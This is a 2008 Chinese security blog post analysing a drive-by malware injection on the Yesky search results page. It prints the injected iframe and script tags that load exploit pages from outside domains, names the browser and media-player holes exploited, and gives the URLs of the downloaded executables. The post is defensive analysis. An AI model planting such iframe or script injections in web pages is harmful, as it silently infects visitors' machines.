天极搜索被挂木马

http://www.yesky.com天极网为国内著名IT门户网站。2008224星期日中午1100经过网友反映发现其搜索引擎结果返回页面被挂木马网页连接。

11.JPG

http://search.yesky.com/index.html为天极搜索主页。经过分析得知,木马页面挂在了搜索结果返回页上,假如搜索关键词没有相符的网页,会返回http://search.yesky.com/jsp/hint.jsp?type=1&wd=*****而这个页面是没有问题的。   看看搜索结果返回页的代码。发现底部被添加了一段框架http://www.yixoo.com/yixoo2.html页面代码包含一个框架:22.JPG

 <iframe src=http://xxx.aishengho.com/dm.htm?id=002 width=100 height=0></iframe>

该域名的命名和参数都与一直以来流行的挂马页面相似:

http://xxx.9yimeiyuan.com/xx.htm?id=017

http://xxx.hao1680.com/xx.htm?id=017  

  http://xxx.aishengho.com/dm.htm?id=002包含如下代码。

2个调用和2个统计代码:

<script language=javascript src=http://town.521town.com/wm/rl.js></script>

 

<iframe src=http://town.521town.com/wm/jh.htm width=100 height=1></iframe>

 

</body></html>

 

<script src=’http://s55.cnzz.com/stat.php?id=474784&web_id=474784′ language=’JavaScript’ charset=’gb2312′></script>

 

  

<script language=”javascript” type=”text/javascript” src=”http://js.users.51.la/994346.js” mce_src=”http://js.users.51.la/994346.js”></script>

   

http://town.521town.com/wm/rl.jsREAL漏洞,代码没有经过加密,但做过了对卡巴的免杀,目前还是过了卡巴。将SHELLCODE经过ALPHA解密以后得出地址:

http://iii.chsip.net/cat.exe

33.JPG

 http://town.521town.com/wm/jh.htm06014漏洞,下载http://iii.chsip.net/down.exe,底部加了调用代码。调用了包含PPS,暴风,联众等漏洞。均下载http://iii.chsip.net/down.exe通过分析这些网马页面,发现均由cuteqq网马生成器所生成。 与近来流行的挂马页面的代码大体一致。以下为该网马生成器的信息:网站:http://www.cuteqq.cnQQ78437823744.JPG

发现该组织所制造的网马比较成熟全面,使用者众多。危害甚大。但由于无法得到生成器,所以没有进行更深入的针对分析。不过从图中和介绍可见其软件所使用的漏洞都是网络流传公开的漏洞。并无严重0DAY55.JPG该恶意脚本域名早已被IE伴侣拦截:请及时升级更新IE伴侣的地址库。以便对恶意网站进行防御。  

Popularity: 12% [?]